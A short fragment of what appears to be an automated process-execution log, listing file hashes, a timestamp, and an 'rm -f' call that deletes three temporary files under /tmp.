File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 05:50:00 |
Start date (UTC): | 10/05/2025 |
Path: | /usr/bin/rm |
Arguments: | rm -f /tmp/tmp.AuvqT3u8Nb /tmp/tmp.LwYSwGXz30 /tmp/tmp.PqowgKSo5U |
File size: | 72056 bytes |
MD5 hash: | aa2b5496fdbfd88e38791ab81f90b95b |